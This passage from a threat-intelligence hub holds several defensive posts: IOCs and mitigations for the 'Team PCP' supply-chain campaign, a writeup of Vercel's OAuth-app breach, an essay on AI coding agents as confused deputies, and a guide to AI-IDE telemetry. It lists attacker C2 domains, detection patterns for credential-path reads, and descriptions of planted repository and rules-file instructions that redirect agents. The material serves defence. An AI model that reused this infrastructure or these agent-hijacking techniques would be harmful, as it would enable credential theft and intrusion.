- tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io — ICP canister fallback
- championships-peoples-point-cassette.trycloudflare[.]com — Cloudflare tunnel
- investigation-launches-hearings-copying.trycloudflare[.]com — Cloudflare tunnel
- souls-entire-defined-routes.trycloudflare[.]com — Cloudflare tunnel
- 83.142.209.11 — direct IP (KICS phase)

Filesystem and behavioral artifacts:

- /tmp/pglog — CanisterWorm payload drop path
- Pod names containing host-provisioner-std or host-provisioner-iran
- Container names kamikaze or provisioner
- Public GitHub repositories named tpcp-docs or docs-tpcp on victim accounts, with stolen material as release assets
- Marker string # hacked by teampcp in decoded payloads

VirusTotal hash (Trivy phase): 18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a

Xinference SHA-256s (JFrog):

- xinference/__init__.py — e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127
- Decoded stage 1 — 077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c
- Decoded stage 2 — fe17e2ea4012d07d90ecb7793c1b0593a6138d25a9393192263e751660ec3cd0

GitHub identities used to publish malicious tags:

- cx-plugins-releases (account ID 225848595) — KICS phase
- ast-phoenix — OpenVSX extensions

###### Detection and mitigation

For environments that may have run any affected version, treat compromise as the working hypothesis until proven otherwise. The campaign harvests broadly and exfiltrates immediately.

- Pin GitHub Actions by SHA, not by version tag. The Trivy and KICS compromises both relied on tag force-update — workflows that pinned to @v3 or similar received the malicious commit when the tag moved. SHA pinning is the structural fix that survives tag-hijack.
- Review GitHub audit logs for unusual create/delete branch sequences from service accounts (TeamPCP rapidly created and deleted branches to test stolen tokens), unfamiliar repository creation, and any commits to tpcp-docs or docs-tpcp repositories.
- Block egress to the listed C2 domains at the network perimeter and on agent hosts. The Cloudflare Tunnel and ICP-canister fallbacks are harder to block without breaking legitimate traffic, but the primary domains and the typosquat are clean blocks.
- Hunt for systemd user-unit persistence on Linux developer hosts and CI workers that touched any affected version: any user unit polling checkmarx[.]zone/raw is the persistence mechanism.
- Rotate everything reachable from any host that ran an affected version: GitHub PATs, npm publish tokens, AWS / Azure / GCP credentials, Kubernetes service account tokens, SSH keys, signing material, secrets in non-sensitive environment variables. The malware enumerates broadly; assume everything is exfiltrated.
- Ban Bun fetches from CI runners that don't legitimately use Bun. Outbound traffic to github.com/oven-sh/bun/releases from a runner mid-install is a strong adversary signal across the Bun-runtime variant of the payload.
- Treat security tooling like any other supply chain. The same review hygiene that protects against generic npm/PyPI compromise — lockfile pinning, --ignore-scripts by default, signed releases, provenance attestation — applies to the security industry's own tools.

###### Attribution discipline

"Team PCP" is a tracking name applied independently by Wiz, Sysdig, Aikido, Open Source Malware, and Datadog Security Research based on overlapping TTPs and infrastructure across the campaign chain.
The marker string # hacked by teampcp appears in payloads, and the campaign's worm component self-labels as CanisterWorm. Third-party reporting has associated related activity with the aliases DeadCatx3, PCPcat, ShellForce, and CanisterWorm; these are self-applied labels in payload material and onion-site claims, not independent confirmation of actor identity. The Mini Shai-Hulud npm cluster of April 29–30 (Lightning PyPI + SAP CAP npm packages) shows tooling overlap; a shared operator is consistent with available reporting but not confirmed.

We use the campaign codename Team PCP throughout this writeup. We do not claim hard attribution to a specific country, group, or named individual. Defenders can act on the IOCs and TTPs without needing attribution to be settled.

###### What this signals for 2026

Three durable observations from the chain so far:

- Self-spreading credential theft scales. The CanisterWorm pattern — stolen credentials used to publish trojanized downstream packages — converts each successful compromise into multiple new victims without operator effort. As long as security tooling pipelines hold publishing credentials with broad scope, this pattern continues.
- Security tooling is a high-value target. Six weeks of repeated targeting against Trivy, Checkmarx, and Bitwarden is not coincidence. The vendors whose products defenders trust to detect supply-chain compromise are the highest-leverage victims. Treat your scanner vendor's release pipeline with the same rigor you'd apply to any production supply chain.
- Tag pinning is over. GitHub Action consumers who pin by version tag get whatever the maintainer (or the maintainer's compromised account) currently points the tag at. Two separate vendors got force-updated within five weeks. SHA pinning is the structural answer; allowlisting action versions in policy-as-code is second best.
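The SHA-pinning recommendation is mechanically auditable. A minimal sketch, assuming workflow YAML is passed in as a string (wire it across `.github/workflows/*.yml` in CI); the regex covers the common `uses: owner/repo@ref` form and will miss local (`./`) and docker:// references:

```python
import re

# Flag GitHub Actions `uses:` references pinned by tag or branch instead
# of a full 40-hex commit SHA. Simplified regex — an assumption, not a
# complete workflow parser.
USES_RE = re.compile(r"^\s*(?:-\s+)?uses:\s*([\w.-]+/[\w.-]+)@(\S+)", re.M)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")

def unpinned_actions(workflow_text):
    """Return (action, ref) pairs whose ref is not a full commit SHA."""
    return [(action, ref) for action, ref in USES_RE.findall(workflow_text)
            if not SHA_RE.match(ref)]

workflow = """
jobs:
  test:
    steps:
      - uses: actions/checkout@v3
      - uses: actions/setup-node@8f152de45cc393bb48ce5d89d36b731f54556e65
"""
print(unpinned_actions(workflow))
```

Failing the build on any non-empty result is the CI-gate version of "SHA pinning is the structural answer."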
The closest peer pattern in the recent CVE record is CVE-2026-12091 — npm maintainer-account takeover with postinstall credential theft. Same shape, different vector. The time-to-criminalization framework applied to that CVE shows what to expect from this class of bug: the implant work is already done, so commoditization happens on the order of days rather than months. Patch and rotate accordingly.

Final observation on the threat-intelligence shape. Despite Team PCP's loud operational footprint — six weeks of researcher coverage, public IOCs in widely-shared formats, named C2 domains — the campaign has no measurable presence in commodity criminal markets. There's no broker pricing for the worm, no exploit-kit packaging of the GitHub Actions injection technique, no forum trade volume. That isn't a sensor failure. It's the campaign's actual shape: Team PCP is the operator, not a vendor selling capability. The credentials they exfiltrate may eventually appear in stealer-log markets, but the attack itself doesn't commoditize. Same telemetry-surface lesson as the AI-IDE marketplace surface: monitor the legitimate channel where the attack actually lives — package registries, GitHub Actions tag history, OAuth grants — not .onion forums where it doesn't.

---

# Vercel's April 2026 incident: an OAuth-app supply chain in three hops

URL: https://keepsecure.io/hub/vercel-oauth-supply-chain-april-2026
Published: 2026-04-30
Campaign: Vercel April 2026 incident
First seen: 2026-04-19
Sectors: SaaS, Cloud platforms, Developer infrastructure
Regions: Global
Tags: threat-intel, OAuth, Google Workspace, third-party risk, supply chain, identity, Vercel

Vercel's April 2026 breach moved from a third-party AI tool to a Workspace account to internal Vercel access. The OAuth-app supply-chain pattern in detail.

On April 20, 2026, Vercel disclosed the root cause of an internal-systems compromise: a third-party AI tool (Context.ai) used by a Vercel employee was breached, the foothold was used to take over the employee's Vercel-linked Google Workspace account, and from there the attacker reached certain Vercel environments and environment variables. Three hops, each with its own trust boundary, each broken in turn. The pattern is "OAuth app as supply chain" — and it's the cleanest published example so far of how a SaaS company gets compromised through a tool its employees connected to their identity provider, not through any direct vulnerability in its own infrastructure.

###### What we know

- April 19, 2026 — Vercel discloses the incident. Initial bulletin states attackers accessed certain internal systems; services remain operational; a limited subset of customers is impacted.
- April 20, 2026, 02:01 UTC — Vercel publishes the root cause. Three-hop chain: Context.ai compromise → Vercel employee's Google Workspace account → certain Vercel environments and environment variables stored as non-sensitive.
- Confirmed IOC — Google Workspace OAuth client ID 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com, corresponding to the third-party AI app in the attack path.
- Scope of access — Vercel reports values stored as sensitive environment variables remained unreadable. Values stored as non-sensitive environment variables should be treated as exposed.

> The non-sensitive distinction is the lesson. Vercel's environment-variable model has two tiers; the lower tier is not encrypted-at-rest in a way that survives the kind of access an OAuth-app compromise grants. Anyone running secrets through non-sensitive Vercel env vars discovered they were trusting a different threat model than they thought.
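The confirmed client-ID IOC can be hunted for directly in Workspace audit exports. A minimal sketch, assuming events arrive as dicts with a nested parameter list loosely shaped like Admin SDK Reports API output — the exact field names are an assumption; adapt them to your export:

```python
# Filter Google Workspace audit events for the confirmed OAuth client ID.
# Event shape (dicts with a "parameters" list of name/value pairs) is an
# assumption modeled on common Reports API exports.
IOC_CLIENT_ID = ("110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj"
                 ".apps.googleusercontent.com")

def events_for_client(events, client_id=IOC_CLIENT_ID):
    """Return audit events whose client_id parameter matches the IOC."""
    hits = []
    for event in events:
        params = {p["name"]: p.get("value") for p in event.get("parameters", [])}
        if params.get("client_id") == client_id:
            hits.append(event)
    return hits

sample = [
    {"name": "authorize",
     "parameters": [{"name": "client_id", "value": IOC_CLIENT_ID}]},
    {"name": "authorize",
     "parameters": [{"name": "client_id", "value": "some-other-app"}]},
]
print(len(events_for_client(sample)))
```

Any hit during the affected window means the grant was exercised and the account should be treated per the rotation guidance below.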
###### Targeting

Direct targeting was Vercel itself; second-order targeting includes any Vercel customer whose secrets sat in a non-sensitive environment variable on a project the compromised internal accounts could reach.

- Vercel internal infrastructure — the direct target. Internal accounts, certain environments, environment-variable inventories.
- The Vercel customers Vercel contacted — limited subset, specific to the projects/environments the compromised accounts could reach.
- Any organization using OAuth third-party AI tools widely — same vector applies. The Vercel chain is one realization of a general pattern.

###### TTPs and the OAuth-as-supply-chain pattern

The chain in operational terms:

- Hop 1 — Context.ai compromise. Public reporting does not detail the initial-access mechanism on Context.ai's side. The salient observation is that a third-party AI tool installed by individual employees became the source of foothold.
- Hop 2 — Google Workspace OAuth grant abuse. Context.ai had been authorized as an OAuth third-party application against the employee's Google Workspace identity. With Context.ai compromised, the attacker leveraged the OAuth grant to access the employee's Google Workspace mailbox, drive, and adjacent services within the scope of the granted permissions.
- Hop 3 — internal Vercel access via Google identity federation. Vercel uses Google Workspace as the identity backbone. Once the attacker had the employee's Google Workspace foothold, services that federate identity from Workspace were reachable. From there the attacker reached Vercel environments and environment variables the employee's identity could see.

The trust assumption that breaks at each hop is different. Hop 1 assumes Context.ai's security is comparable to Vercel's (it isn't necessarily — third-party AI tools are often early-stage companies with smaller security programs). Hop 2 assumes the OAuth grant is a permission boundary; it is, but only against external attackers, not against attackers who have compromised the OAuth client itself. Hop 3 assumes Workspace federation is a strong identity boundary; it is, until you remember that the Workspace account itself was reached from outside.

###### Indicators of compromise

- Google Workspace OAuth client ID — 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com. Filter Workspace audit logs for activity from this client ID during the affected window.
- Context.ai authorization grants — review Security > Access and data control > API controls > Manage Third-Party App Access in Workspace admin for the listed client ID; revoke wherever found.
- Vercel non-sensitive environment variables — inventory across every project. Secrets stored at this tier in the affected window should be treated as exposed.

Datadog log queries (provided by Datadog Security Research):

- Activity for the OAuth client ID: source:gsuite @actor.applicationInfo.oauthClientId:110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com
- Authorization events for the client ID: source:gsuite @evt.name:authorize @event.parameters.client_id:110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com

###### Detection and mitigation

- Revoke the OAuth grant. Find the Context.ai client ID in your Workspace admin third-party app inventory and revoke. Have individual users review their personal Google account third-party access for the same client ID.
- Rotate everything in non-sensitive Vercel environment variables. API keys, access tokens, database credentials, signing material. Re-create as sensitive environment variables wherever the Vercel project supports the distinction.
- Audit Workspace OAuth grants holistically. The Vercel incident is one realization of a class. Inventory all third-party AI tools authorized as OAuth apps; review the scopes each holds; revoke ones that aren't load-bearing or whose vendor security posture you can't validate.
- Treat Workspace as a privileged identity boundary. If your engineering platform federates from Workspace, every Workspace account compromise is also a platform compromise. Phishing-resistant MFA on Workspace, conditional access policies, and short-lived federated sessions all reduce the blast radius of hop 3.
- Detect OAuth-key-driven privileged actions. Datadog Cloud SIEM ships rules covering OAuth keys performing account creation or security changes, and unfamiliar service accounts modifying group memberships. These are the post-OAuth-compromise patterns to watch for.
- Detect session-cookie hijacking. Google's own session-termination signals (suspicious cookie detection) are a useful tripwire — Cloud SIEM's Google Workspace user account signed out due to suspicious session cookie rule surfaces them.

###### What the OAuth-as-supply-chain pattern means

Three observations stand out from the Vercel chain:

- Third-party AI tools are an under-modeled supply chain. Employees connect them to Workspace identities at individual discretion. The grant lifetime is long, the scope is often broader than the use case requires, and the vendor's security posture is often early-stage. Context.ai-class compromise is going to recur; the question is whether your organization's OAuth grant inventory tracks who's authorized what.
- "Sensitive" vs "non-sensitive" environment variables are a real boundary that defenders need to use. Vercel's distinction between the two tiers wasn't marketing — sensitive values were unreadable to the attacker; non-sensitive values were exposed. Other platforms have similar distinctions (Kubernetes Secret encryption-at-rest, AWS Parameter Store SecureString, GCP Secret Manager). Use the protected tier wherever it exists.
- Identity-federation-as-supply-chain is the next chapter. When Workspace is your platform identity, Workspace OAuth surface is your platform's perimeter. The same employees who would never grant a random vendor admin access to your AWS account routinely grant Workspace-OAuth-third-party-app access without much review. The grants are the perimeter now.

The closest conceptual peer in the recent record is the AI-agent-as-confused-deputy pattern — a privileged process operating on attacker-influenced input. Here the deputy is the Context.ai OAuth app, the input is whatever the attacker fed into Context.ai, and the privileges are Workspace-grant scope. Same pattern, different deputy. Capability narrowing — short-lived OAuth grants, scope-minimized rather than scope-maximized — is the structural defense, the same way it is for AI-agent runtimes.

For comparison with a different supply-chain shape running concurrently, see the analysis of Team PCP's six-week chain through security tooling vendors. Team PCP attacks the package-publish boundary. The Vercel chain attacks the OAuth-grant boundary. Both end with attacker-controlled code (or attacker-controlled identity) reaching credentials it shouldn't. Different vectors, same outcome class.

One final framing note. The Vercel chain has no observable presence in criminal markets — no Context.ai-credential brokering, no Workspace-OAuth-grant trade, no commodity packaging of the technique. That's the expected shape: identity-federation attacks like this one are operator-specific, executed by the same attacker who compromised hop 1, and don't commoditize into kits other operators can buy. The detection signal lives in your Workspace audit logs and your Vercel project inventory — not on .onion forums. Same lesson as the AI-IDE marketplace surface: monitor the legitimate channel where the threat actually lives.
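The holistic grant audit recommended above reduces to a scope-breadth triage over the grant inventory. A minimal sketch — the inventory shape and the "broad" list are assumptions (tune the list to your risk model); the scope strings shown are real Google OAuth scopes:

```python
# Triage a Workspace third-party-app grant inventory by scope breadth.
# Which scopes count as "broad" is a policy choice, not a fixed list.
BROAD_SCOPES = {
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/drive",
    "https://www.googleapis.com/auth/admin.directory.user",
}

def broad_grants(grants):
    """Return (app, broad-scopes) pairs worth manual review."""
    flagged = []
    for grant in grants:
        hits = BROAD_SCOPES & set(grant["scopes"])
        if hits:
            flagged.append((grant["app"], sorted(hits)))
    return flagged

inventory = [
    {"app": "notes-ai", "scopes": ["https://www.googleapis.com/auth/drive"]},
    {"app": "calendar-sync",
     "scopes": ["https://www.googleapis.com/auth/calendar.readonly"]},
]
print(broad_grants(inventory))
```

Every flagged pair is a hop-2 candidate: if that vendor is breached, those scopes are what the attacker inherits.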
---

# The AI agent as confused deputy: a 2026 attack class

URL: https://keepsecure.io/hub/ai-agent-confused-deputy-pattern
Published: 2026-04-29
Tags: AI agents, confused deputy, threat modeling, capability security, isolation, security architecture

Four recent CVEs reveal the AI agent as confused deputy: privileged process, attacker-controlled input. The class named, mapped, and defended.

A confused deputy is a program that holds privileges, accepts requests from a less-privileged caller, and gets tricked into using its privileges on the caller's behalf. The original example dates from 1988. In 2026, the deputy is the AI coding agent — and a recent cluster of CVEs makes the class concrete.

###### The pattern

The unprivileged caller is the input the agent operates on: a GitHub repository, a user prompt, a downloaded model file, a package.json. The privileges the deputy holds are the things that make the agent useful in the first place — cloud credentials, the ability to run shell commands, the ability to publish packages, the ability to load and execute model weights. The same property that makes agents productive makes them a confused-deputy magnet.

> The agent is not malicious. The agent is doing its job. It got handed an input, and the input told it to do something the agent's privileges allowed.

###### CVE-2026-34040 — Docker authorization plugin bypass

- Deputy — the AI coding agent's Docker daemon.
- Attacker-influenced input — a malicious GitHub repository the agent has cloned and is operating on.
- Privileges held — Docker API access, cloud credentials mounted at container start, kubeconfig.
- Confusion mechanism — the malicious repository contains instructions, in README, devcontainer config, or postinstall hook, that cause the agent itself to execute a crafted Docker API call that bypasses the authorization plugin.

The pattern in its purest form. The agent is doing what it was asked to do; the request was attacker-controlled.
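The confusion mechanism here — instructions planted in install hooks or devcontainer config — can be pre-screened before the agent ever touches the clone. A minimal sketch that checks the standard npm and devcontainer file locations; the flag-anything policy and the finding labels are simplifications, not a complete scanner:

```python
import json
from pathlib import Path

# Pre-invocation static check on a cloned repository for the input
# surfaces this class abuses: npm install hooks and devcontainer
# lifecycle commands. Any hit gates the repo behind human review.
HOOKS = ("preinstall", "install", "postinstall")
LIFECYCLE = ("postCreateCommand", "postStartCommand")

def repo_findings(repo):
    """Return a list of risky-hook findings for the repository at `repo`."""
    repo = Path(repo)
    findings = []
    pkg = repo / "package.json"
    if pkg.is_file():
        scripts = json.loads(pkg.read_text()).get("scripts", {})
        findings += [f"package.json scripts.{h}" for h in HOOKS if h in scripts]
    dc = repo / ".devcontainer" / "devcontainer.json"
    if dc.is_file():
        cfg = json.loads(dc.read_text())
        findings += [f"devcontainer.{k}" for k in LIFECYCLE if k in cfg]
    return findings
```

Run it as a gate before agent invocation: a non-empty result means the repo can execute code the moment it is installed or opened, so it gets reviewed before any privileged agent does.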
###### CVE-2026-7733 — LangChain PythonREPLTool escape

- Deputy — the LangChain PythonREPLTool.
- Attacker-influenced input — a prompt that reaches the REPL through the agent's normal control flow.
- Privileges held — Python execution in the agent's process.
- Confusion mechanism — a missing check on __import__ lets a prompt-controlled call break out of the documented sandbox.

The REPL was designed under the assumption that prompts are bounded data. They aren't. They are code-equivalent input that should not have been treated as data in the first place — true of every prompt-driven tool, not just this one. The CVE is the specific bug; the class is "tools designed under the wrong threat model."

###### CVE-2026-12091 — npm postinstall maintainer takeover

- Deputy — npm install.
- Attacker-influenced input — a corrupted version of a legitimate package, signed by the legitimate maintainer because the maintainer's account was taken over.
- Privileges held — code execution at install time, often as the developer user with full env-var, SSH-key, and git-credential access.
- Confusion mechanism — there isn't one. postinstall does what postinstall always did. The change is who controls the script.

The cleanest mapping. The deputy doesn't have a bug. The pattern is the bug — running attacker-controlled code with developer privileges at every install. Patching npm doesn't help; the fix has to be structural.

###### CVE-2026-5760 — SGLang malicious GGUF

- Deputy — the GGUF model loader.
- Attacker-influenced input — a downloaded weight file.
- Privileges held — code execution in the inference server's process.
- Confusion mechanism — parser flaw lets a malicious model file achieve RCE via the loader.

The trust boundary used to be "downloaded binary." Anyone running an inference server understood that running attacker-supplied binaries was dangerous. The new boundary is "downloaded weights" — and that boundary moved without anyone announcing it. Most operators still treat GGUF files as data, not code-equivalent.

###### Why 2026 specifically

The confused-deputy pattern is forty years old. What changed is two things, both about privilege.

First, privilege-bearing agents are now common. Two years ago, an AI agent was a chatbot in a sandbox with no real authority. Today, agents routinely hold long-lived cloud credentials, GitHub publish tokens, npm publish tokens, kubeconfigs, and the ability to write to file paths that matter. Agents are useful because of those privileges. They are dangerous because of them too.

Second, agent input surfaces are inherently untrusted. Agents are designed to work on user-supplied inputs — GitHub repositories from anywhere, prompts from anywhere, model weights downloaded from anywhere. The agent's job is to accept those inputs and act on them. That makes every untrusted-input boundary in the stack a confused-deputy candidate by default.

Combine the two and the picture is clear. An entire generation of infrastructure has been built on the assumption that "running in a Docker sandbox" was sufficient isolation, paired with input surfaces that include arbitrary attacker-controlled code and prompts. The four CVEs are not unusual events. They are the predictable consequence.

###### Privilege narrowing is the structural fix

The single biggest mistake in agent security architecture is treating "isolation" as a binary property of the runtime. It isn't. It's a property of the credential and capability surface the agent reaches into. Long-lived admin credentials mounted into agent sandboxes are an anti-pattern; the mounted credentials become the privilege surface that a successful confused-deputy attack reaches.

- Short-lived, scope-narrowed tokens issued per-task. Generate the token when the user dispatches the task; revoke it when the task completes.
- Tokens that can do only what the task needs. Per-task IAM roles in cloud, per-task GitHub fine-grained PATs, per-task npm publish tokens scoped to a single package.
- Read-only by default. Make write privileges an explicit, narrow exception.

###### Isolation that survives agent subversion

Shared Docker on a host with cloud credentials is not a security boundary for untrusted code. CVE-2026-34040 makes this explicit, but it was true before the bug was disclosed.

- Per-task isolation domains — Firecracker microVMs, gVisor sandboxes, per-task Kubernetes pods with their own IAM principal.
- Design the isolation domain as the unit of compromise. A fully compromised domain still cannot reach anything you care about.
- Stepping-stone pattern for production — agent → tightly-scoped intermediary service → production. The intermediary enforces the policy the agent doesn't.

###### Treat all agent inputs as untrusted code-equivalent

A repository from an internal user is not safer than one from an external user, in security terms. The internal user might have been phished. Their account might have been taken over. An attacker-controlled package.json looks identical regardless of who pushed it.

- No per-source allowlisting based on "trusted internal." Every input flows through the same untrusted-input pipeline.
- Static analysis on incoming repositories before agent invocation — package.json install hooks, dev-container configs, GitHub Actions workflows, .cursorrules / .windsurfrules, and any file the agent will read as instructions.
- Prompt input is code-equivalent. If a prompt can reach a tool that executes code, the prompt is an RCE surface.

###### Detect confused-deputy attempts even when patched

The patch fixes the specific bug. The pattern continues. Detection has to be runtime, not advisory-driven.

- Log every privileged operation the agent performs and check it against the user-issued task. Cloud-API calls outside the task scope are evidence of confused deputy.
- Watch for credential-path reads — ~/.ssh, ~/.aws, ~/.npmrc, kubeconfig paths — by agent processes. Almost never legitimate.
- Egress monitoring on agent isolation domains. Outbound traffic to anything other than the package registry, model registry, and explicitly-allowed APIs is suspicious.

###### What this means going forward

The confused-deputy class is going to grow. Every new tool that agents can invoke is a candidate. Every new credential type that gets mounted into agent runtimes is a candidate. The question for security teams is not whether their agents will be used as deputies — they will. The question is whether the privilege surface the deputy can reach is narrow enough that a successful confusion is recoverable. Capability-based design is forty years old too. It came back into fashion at the right time.

---

# Where AI-IDE threats actually live: telemetry beyond the dark web

URL: https://keepsecure.io/hub/ai-ide-marketplace-security-telemetry
Published: 2026-04-29
Tags: AI IDE, Cursor, VS Code, OpenVSX, supply chain, detection engineering

Dark-web sweeps come up empty for AI-IDE threats — but the threat exists. It's on the legitimate marketplace. Where to look and what to alert on.

Defenders trying to monitor the AI-IDE threat surface — Cursor, Windsurf, the VS Code agent ecosystem, OpenVSX-distributed extensions — point dark-web sweeps at it and get clean negatives. The mistake is concluding the threat doesn't exist. It does. It just isn't on .onion. The threat is going through the legitimate marketplace, the legitimate registry, the legitimate dependency tree, and the legitimate repository. That's where the telemetry needs to be.

###### The wrong instrument

Pointing dark-web monitoring at the AI-IDE threat surface is a reasonable first instinct on a new threat class. Existing pipelines, existing sources, established alerting.
The result is a clean negative: no broker pricing, no commodity exploit-kit packaging, no measurable trade volume in the criminal market. Empty.

The public record from the last fourteen months tells a different story. GlassWorm propagated malicious extensions through OpenVSX via a compromised maintainer account. SleepyDuck shipped a RAT in a VSX extension that uses Ethereum smart contracts as a sinkhole-resistant C2. A "vibe-coded" VS Code extension shipped through the legitimate marketplace with built-in ransomware. A critical OpenVSX registry flaw exposed millions of developers. An OpenVSX pre-publish bypass let malicious extensions reach the store. An audit of 100+ VS Code extensions exposed developers to hidden supply-chain risk. The Rules File Backdoor poisoned .cursorrules and .windsurfrules. Malicious npm packages with Cursor-specific install hooks backdoored 3,200 users. Cursor IDE itself accumulated nineteen CVEs in eight months.

> The dark web is empty because the threat isn't going through the dark web. It's going through the legitimate channels. That's where the telemetry needs to be.

###### Where AI-IDE threats actually live

Four telemetry surfaces, in roughly decreasing order of how much you'd catch by watching them: extension marketplaces, repository-level signals, build-time signals, and AI-agent runtime sandboxes.

###### 1. Extension marketplaces (VS Code Marketplace, OpenVSX)

This is the first place a malicious extension touches your users. The attack pattern is consistent across GlassWorm, SleepyDuck, and the vibe-coded ransomware extension: an attacker either compromises an existing publisher account or registers a new one with a plausible-looking name, publishes an extension that performs whatever its description says it does plus the malicious payload, and waits for installs.

- New versions from dormant publishers — a publisher who hasn't published in 90+ days suddenly shipping an update is a strong suspicion signal. The compromised-maintainer pattern fingerprints here.
- Unusual capability sets — full filesystem access, network egress to non-marketplace domains, child-process spawn rights. Capability requests are declared in package.json; you can audit them before installation.
- JavaScript that resolves URLs from on-chain sources — Ethereum smart contracts, IPFS, blockchain RPC endpoints. SleepyDuck used this; the pattern is fingerprintable in the extension's bundled JS.
- Postinstall and activation hooks that touch credential paths — ~/.ssh, ~/.aws, ~/.npmrc, ~/.config/gh, OS keychain APIs, browser cookie databases. Almost never legitimate for an IDE extension.
- Network egress in the extension's first 60 seconds of activation, to destinations that aren't the extension's declared backend. Out-of-distribution egress is the cleanest single signal you can collect.

Collection: subscribe to marketplace publish feeds (both VS Code Marketplace and OpenVSX expose them). Run static analysis on the bundled JS and package.json of every new publish. Run dynamic capability tracing in a throwaway sandbox on a sampled fraction. The signal-to-noise on capability tracing is high enough that you can alert on the unusual cases directly.

###### 2. Repository-level signals

The Rules File Backdoor demonstrated that the malicious payload can sit in the repository the agent is instructed to operate on. .cursorrules, .windsurfrules, .github/copilot-instructions.md, devcontainer.json, .vscode/tasks.json, .devcontainer/Dockerfile — all of these are files the agent reads as instructions, and any of them can be modified to redirect the agent's behavior.

- Modifications to rules files by non-human committers. Bots and automated scripts modifying .cursorrules / .windsurfrules / instructions markdown is almost always wrong.
- New files in .github/workflows/ with permissions that exceed apparent purpose — id-token: write, contents: write, packages: write on a workflow that says it's just running tests.
- VS Code task and launch config additions — modifications to .vscode/tasks.json and .vscode/launch.json that introduce new shell-out commands. These run in the developer's shell context with the developer's credentials when the IDE opens the workspace. - Devcontainer postCreateCommand and postStartCommand additions. Same risk profile as npm postinstall, but at container start instead of package install. Collection: treat these files like .github/workflows/*.yml — security-sensitive configuration that requires explicit review. CI hook on PR open that diffs the rules-file content and requires a human-approved label before merge. Most orgs already have this pattern for workflow files; extend it. ###### 3. Build-time signals Every npm install is a code-execution event. The recent npm registry compromise (CVE-2026-12091) made this concrete with a 38-million-weekly-downloads compromise, but the pattern was true before the CVE was disclosed and will be true after the patch ships. - Postinstall and preinstall scripts that touch credential paths or perform network egress. Most packages have neither; the ones that do are the high-value audit set. - Lockfile diffs pulling in versions from compromised windows. One-time scan against the published list of bad versions, but worth doing across every active repository. - Postinstall scripts running outside the build's nominal host. If your CI runs npm install in container A and the postinstall script tries to reach the cloud metadata service from container A, that's evidence of attempted credential theft. - New postinstall script content in dependency updates. Mass changes to a previously-stable script are suspicious. Collection: instrument your CI runner to log all postinstall and preinstall commands and outbound network attempts during install. Most CI vendors expose audit logs sufficient for this. 
For local developer machines, the most defensible answer is "developers should run npm install inside a sandboxed container with no credential mounts," which most orgs are not yet doing but should be. ###### 4. AI-agent runtime sandboxes Once an agent is running on your infrastructure, the question is what it can reach. This is the runtime equivalent of the marketplace question — you've passed the perimeter, now watch what happens inside. - Cloud-API calls from agent sandboxes that don't match a user-dispatched task. An agent asked to refactor a TypeScript file should not be calling iam:GetUser or reading the cloud metadata service. - kubeconfig reads, Docker socket access, and credential-path reads from agent processes. These are confused-deputy fingerprints. - Outbound network connections to destinations outside the agent's allowed set — package registries, model registries, the LLM API endpoint. Anything else is suspicious by default. - Privilege-escalation patterns inside the sandbox — setuid binary execution, kernel module probes, container-escape primitives. Collection: runtime security tooling on the host or per-pod (eBPF-based runtime sensors are the standard answer). Signal volume is moderate; the false-positive rate is manageable if you scope alerting tightly to the credential-path-read and out-of-task-cloud-API patterns specifically. ###### Detection-engineering rollout order The work split among the four sources is roughly: marketplace ingestion is highest-leverage (one pipeline catches every malicious extension before it reaches a single user). Repository signals are medium-leverage and easy wins (most controls extend existing PR-review hygiene). Build-time signals are medium-leverage and require CI integration. Runtime sandbox monitoring is high-leverage but expensive — required if you run agents in production with real privileges, less critical if your agents are toy assistants. 
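The credential-path-read predicate from source 4 is narrow enough to write down. A minimal sketch — the glob list and function name are illustrative assumptions; in a real deployment this predicate would run in the userspace agent of an eBPF sensor, evaluated against file-open events from agent sandboxes:

```python
import fnmatch

# Paths whose reads by an agent process are confused-deputy fingerprints
# (illustrative list, taken from the signals discussed above).
SENSITIVE_GLOBS = [
    "*/.ssh/*", "*/.aws/*", "*/.npmrc", "*/.config/gh/*",
    "*/.kube/config", "/var/run/docker.sock",
]

def is_credential_path_read(path: str) -> bool:
    """True if a file-open event from an agent sandbox should alert."""
    return any(fnmatch.fnmatch(path, g) for g in SENSITIVE_GLOBS)
```

Scoping alerting to exactly this predicate (plus the out-of-task cloud-API pattern) is what keeps the false-positive rate manageable.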
A reasonable rollout order for an org starting from zero is marketplace ingestion first, repository hooks second, CI install instrumentation third, runtime sandbox monitoring fourth. The first two have low setup cost and high coverage; the last two require infrastructure investment that should be informed by what the first two are catching. ###### What to retire Pointing dark-web monitoring at the AI-IDE threat surface is not wrong, but it's not where the signal is. Keep the dark-web pipeline running for what it's good at — credential leakage, infostealer harvests, ransomware leak sites, broker price sheets for commoditized exploit kits. Add the four telemetry sources above for AI-IDE specifically. Don't expect the dark-web pipeline to fire on this bug class; the criminal market hasn't picked it up because the criminal market doesn't need to. The attacker can publish to OpenVSX directly. The right detection-engineering posture for AI-IDE in 2026 is to assume the threat is going through legitimate channels, build telemetry for those channels, and treat the dark-web absence as confirmation that you're looking in the right places — not as evidence that there's nothing to look for. For the contrasting case — what dark-web crossing actually looks like when the bug class supports commoditization — see the CopyFail time-to-criminalization analysis. A Linux page-cache LPE with the right reliability properties showed up on a carding forum's Exploits section seven days after disclosure. Same pipeline, opposite shape. The two outcomes together describe what the dark-web sensor is measuring and what it isn't. --- # Four AI-coding-agent-stack CVEs you should patch first URL: https://keepsecure.io/hub/ai-coding-agent-cves-patch-priority Published: 2026-04-29 Tags: AI agents, AI supply chain, Docker, npm, LangChain, RCE, patching A short cluster of CVEs has hit the runtime stack AI coding agents rely on — npm install, Docker, LangChain, model loaders. 
